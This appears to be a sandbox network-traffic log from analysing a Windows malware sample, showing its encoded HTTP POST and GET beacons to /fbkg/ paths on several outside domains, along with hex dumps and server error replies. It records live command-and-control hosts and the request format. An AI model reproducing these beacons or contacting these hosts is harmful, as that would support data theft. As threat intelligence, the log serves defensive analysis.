                                                                                                                                                                                                Nov 17, 2023 19:29:37.960114956 CET721OUTData Raw: 4f 45 66 30 66 77 58 50 35 58 72 44 61 71 57 57 72 7a 30 58 68 73 43 45 36 47 75 31 70 4a 57 33 52 67 4c 62 70 4e 53 42 30 37 42 4e 78 4e 79 2f 61 54 6e 77 35 4c 49 32 36 79 65 6a 56 2b 34 39 78 64 63 76 79 61 44 45 72 49 7a 63 78 6f 70 35 4c 6c
                                                                                                                                                                                                Data Ascii: OEf0fwXP5XrDaqWWrz0XhsCE6Gu1pJW3RgLbpNSB07BNxNy/aTnw5LI26yejV+49xdcvyaDErIzcxop5LlSllxnHg+gxyMSN4V09rVLE8eqPFfDj71dZ/gNHmX5ANLIu1IJVuqTLRAZM8ynnt+BBZEzuA9IQQFoEQ9QyvuWrMwedJRn4la986qhDe0n5TAia5B+9ENg2Ik6IPbBhyuX+SvepnN5fFr3flcnbLWDpe6+xWSr6PsA
                                                                                                                                                                                                Nov 17, 2023 19:29:38.275218964 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:37 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                3192.168.11.205013091.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:21.700982094 CET301OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 30 58 63 38 52 73 38 6b 64 61 43 69 63 42 45 6e 4e 52 4f 6f 2f 37 49 50 54 4e 43 31 72 48 4d 5a 36 64 4e 71 59 77 4d 42 6b 5a 53 38 55 4b 59 2f 50 74 43 64 6f 71 4b 4c 45 48 4c 2b 6f 70 6b 65 46 32 2b 79 2f 2b 39 37 34 6d 4e 49 44 39 72 7a 74 6a 77 41 48 75 53 34 31 79 37 5a 79 45 6c 4c 72 33 79 70 30 69 63 61 6e 6d 57 32 61 35 69 62 39 4d 6c 4f 67 49 36 54 66 75 70 32 63 59 6b 48 4a 38 6e 56 72 68 48 32 49 41 34 44 4f 6a 36 79 30 35 54 33 4c 4f 4c 69 62 76 78 33 2b 74 64 49 59 31 65 57 70 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U0Xc8Rs8kdaCicBEnNROo/7IPTNC1rHMZ6dNqYwMBkZS8UKY/PtCdoqKLEHL+opkeF2+y/+974mNID9rztjwAHuS41y7ZyElLr3yp0icanmW2a5ib9MlOgI6Tfup2cYkHJ8nVrhH2IA4DOj6y05T3LOLibvx3+tdIY1eWpw==
                                                                                                                                                                                                Nov 17, 2023 19:26:21.897051096 CET301INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:21 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                391.195.240.12380192.168.11.2050130C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:21.700982094 CET301OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 30 58 63 38 52 73 38 6b 64 61 43 69 63 42 45 6e 4e 52 4f 6f 2f 37 49 50 54 4e 43 31 72 48 4d 5a 36 64 4e 71 59 77 4d 42 6b 5a 53 38 55 4b 59 2f 50 74 43 64 6f 71 4b 4c 45 48 4c 2b 6f 70 6b 65 46 32 2b 79 2f 2b 39 37 34 6d 4e 49 44 39 72 7a 74 6a 77 41 48 75 53 34 31 79 37 5a 79 45 6c 4c 72 33 79 70 30 69 63 61 6e 6d 57 32 61 35 69 62 39 4d 6c 4f 67 49 36 54 66 75 70 32 63 59 6b 48 4a 38 6e 56 72 68 48 32 49 41 34 44 4f 6a 36 79 30 35 54 33 4c 4f 4c 69 62 76 78 33 2b 74 64 49 59 31 65 57 70 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U0Xc8Rs8kdaCicBEnNROo/7IPTNC1rHMZ6dNqYwMBkZS8UKY/PtCdoqKLEHL+opkeF2+y/+974mNID9rztjwAHuS41y7ZyElLr3yp0icanmW2a5ib9MlOgI6Tfup2cYkHJ8nVrhH2IA4DOj6y05T3LOLibvx3+tdIY1eWpw==
                                                                                                                                                                                                Nov 17, 2023 19:26:21.897051096 CET301INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:21 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                30198.177.123.10680192.168.11.2050157C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:40.319109917 CET723OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=PmdWTXkLywcqbBlTiCrJQt3Yuck0afzst3mD161eQBW3I6FKBwy/y4jZCgtmn12fl81iUYGrhkG3BZZ88H83AYfIbFWSFx21qw== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:40.629862070 CET724INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:40 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                30192.168.11.2050157198.177.123.10680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:40.319109917 CET723OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=PmdWTXkLywcqbBlTiCrJQt3Yuck0afzst3mD161eQBW3I6FKBwy/y4jZCgtmn12fl81iUYGrhkG3BZZ88H83AYfIbFWSFx21qw== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:40.629862070 CET724INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:40 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                31216.40.34.4180192.168.11.2050158C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:45.891000986 CET725OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ritualyoga.org
                                                                                                                                                                                                Referer: http://www.ritualyoga.org/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 6d 4c 52 4b 67 4f 31 78 46 72 47 65 71 49 43 54 69 50 39 6d 41 4c 63 62 49 63 4c 6b 2b 46 35 4c 36 74 6b 4b 34 31 42 6b 37 42 77 45 74 61 4e 56 54 33 63 6e 66 44 75 44 39 70 59 50 6a 4c 4d 47 68 54 6b 34 55 42 44 30 47 5a 73 69 2f 53 35 42 4c 33 66 41 72 59 76 38 65 55 31 5a 73 62 30 48 6d 79 4d 44 7a 51 74 43 39 79 68 31 4f 43 64 70 49 32 6f 78 41 37 45 43 53 57 68 30 76 45 6d 30 6c 62 4d 48 69 76 6e 4d 69 6c 63 6c 52 58 4c 2b 62 55 47 73 68 6c 51 74 55 67 36 51 36 53 6f 61 37 57 57 57 34 68 4c 64 75 74 31 4e 6a 75 43 75 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=EmLRKgO1xFrGeqICTiP9mALcbIcLk+F5L6tkK41Bk7BwEtaNVT3cnfDuD9pYPjLMGhTk4UBD0GZsi/S5BL3fArYv8eU1Zsb0HmyMDzQtC9yh1OCdpI2oxA7ECSWh0vEm0lbMHivnMilclRXL+bUGshlQtUg6Q6Soa7WWW4hLdut1NjuCuA==
                                                                                                                                                                                                Nov 17, 2023 19:29:46.039764881 CET726INHTTP/1.1 404 Not Found
                                                                                                                                                                                                server: nginx/1.14.2
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:29:45 GMT
                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                x-request-id: d625bbea-cbb2-4495-8524-f5158d20e6b2
                                                                                                                                                                                                x-runtime: 0.031355
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 53 db c6 bb 7f 9f 4f b1 35 73 6a 93 62 f9 42 20 81 60 3a 8e 31 84 53 02 29 38 4d fb cf 64 5c d9 5a db 2a b2 e4 4a 32 97 f6 e4 bb 9f df f3 ec ae b4 b2 31 a1 d0 f3 e2 cc 24 4c 1a 21 ed 3e f7 db ee 3e db bd ef 0e ce 3a bd df de 77 c5 24 9d 06 fb cf f6 e8 1f 11 b8 e1 b8 55 92 61 89 5e 48 d7 db 7f 26 c4 de 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 57 25 51 e3 4f a9 9f 06 72 bf 3d 4c fd 28 14 9d 28 4c e3 28 08 64 bc 2b ba 37 43 39 e3 b7 43 77 3e 9e a4 7b 35 35 94 26 25 e9 2d 26 e1 49 88 41 e4 dd 8a bf f9 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 0e db f4 f3 5a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 57 d4 67 37 ea d5 97 67 19 e0 0d 31 db 10 51 b0 21 e6 f8 9b 7a 19 9e 11 e8 ac 8e dc a9 1f dc ee 8a 89 0c ae 64 ea 0f dd 0d 71 25 63 cf 0d f1 e0 c6 be 8b 29 89 1b 26 d5 44 c6 fe c8 60 e3 99 89 ff 97 dc 05 b9 8d 4d 83 53 88 c0 0f 65 75 22 7d 70 ba 2b 1a af 16 88 99 c5 b2 88 5c 81 68 34 72 00 d7 13 3f 95 d5 64 e6 0e 01 1b e3 ab d7 b1 3b 2b 70 84 97 ce 20 ba c9 a5 15 c5 1e 49 1a 40 44 12 05 be 27 d6 ba dd ae a1 74 e6 7a 9e 1f 8e f1 39 93 8c 10 4b c2 12 e2 da f7 d2 c9 ae d8 d9 5a a4 99 b4 2f e3 0c 5b a6 90 fa 21 7e 0c 96 5c 63 d0 55 67 ab 79 d8 7c b1 44 40 dd d9 92 53 d1 a0 ff 16 f8 99 34 32 e0 19 5d 4e 13 43 33 e8 45 a1 3a 0d 03 40 08 4b 0f 98 51 04 db 5c a2 b9 48 58 01 6a 73 6b 41 55 8e 07 63 f7 83 e4 3e 31 1f d4 e9 27 93 01 eb a1 1a bb 9e 3f 4f 76 c5 8b 5c a7 86 2d 10 9e db a7 10 9e 9f cc 02 17 a6 37 08 a2 e1 a5 01 63 14 f1 72 51 11 4e 32 9f 02 52 ee 26 99 6a 31 52 34 32 06 c8 99 98 92 41 94 a6 d1 b4 60 18 45 8a ef 22 40 bb 4d c6 be 6d b2 86 8f 25 54 bb 22 8c 42 59 10 ff da 10 2e e2 c2 1b 72 d3 81 d1 92 cf b0 35 66 24 6a 6f cd 0c b0 51 af ff d7 b2 e9 dc 61 36 4e 12 cd e3 a1 14 cf 97 ad 27 97 7c 26 a2 c5 b0 60 66 ff 6d 42 ce b2 13 1d ec d0 4f a6 dd 2c 26 c1 c2 bb 1d fa 79 80 c6 14 89 b6 0c 0b fe 68 5b 83 92 c8 1d 92 34 a4 3a 9e 8b f0 6b 08 b6 2c ff 55 2e b1 08 a1 6b 14 44 d7 bb c2 9d a7 d1 32 ed 79 3c 3d 3c 2c a8 cb f1 c3 51 94 01 cf c5 b6 e4 ad 45 6a 1c 72 a2 7e 38 9f 0e 64 6c b9 ca 72 fc 2e 4a cc 04 91 76 3b 0b e9 b9 5c e0 24 39 d6 cc 98 63 1d 52 f3 20 77 70 70 60 18 4c e5 4d 5a 75 03 7f 8c 04 c0 03 8b bc 11 91 8b bc 55 03 39 a2 10 6d 45 c5 c5 d0 bb 0c 64 77 42 02 ce 43 c2 32 9f 87 db f4 b3 3c d3 71 91 1a af 72 2a ee 4a 71 87 1d fc 29 4e 9d f8 9e 27 c3 0c 61 e6 b0 4b ee 06 c3 10 46 aa 3b af ea 3b f5 ad d7 e2 0b db b6 bb 7b e5 27 c8 29 48 7b d9 88 ed ed ed ec b3 93 c6 c8 35 d5 51 ec 4e 25 54 78 e7 18 c3 77 f6 51 47 52 83 a2 00 c3 49 64 20 87 45 84 6a 3c 86 6b 77 5b 43 76 4f 65 3f 75 07 81 91 49 16 fb 95 04 74 80 00 4f 81 3b 4b 90 0b cd 13 7d 66 38 05 18 29 a5 29 91 1a dd 2c 44 c0 66 6e 35 9e e7 dd 0f 01 b9 95 c2 a6 96 f9 02 20 23 f7 d5 04 98 e9 e9 44 43 58 70 78 c5 5d 31 